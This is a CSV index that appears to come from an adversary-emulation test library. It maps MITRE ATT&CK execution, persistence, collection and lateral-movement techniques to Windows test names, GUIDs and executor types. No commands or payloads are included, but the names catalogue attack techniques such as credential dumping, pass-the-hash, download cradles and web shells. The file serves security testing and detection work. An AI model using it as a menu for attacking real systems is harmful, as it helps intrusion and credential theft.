execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1136.001,Create Account: Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
persistence,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
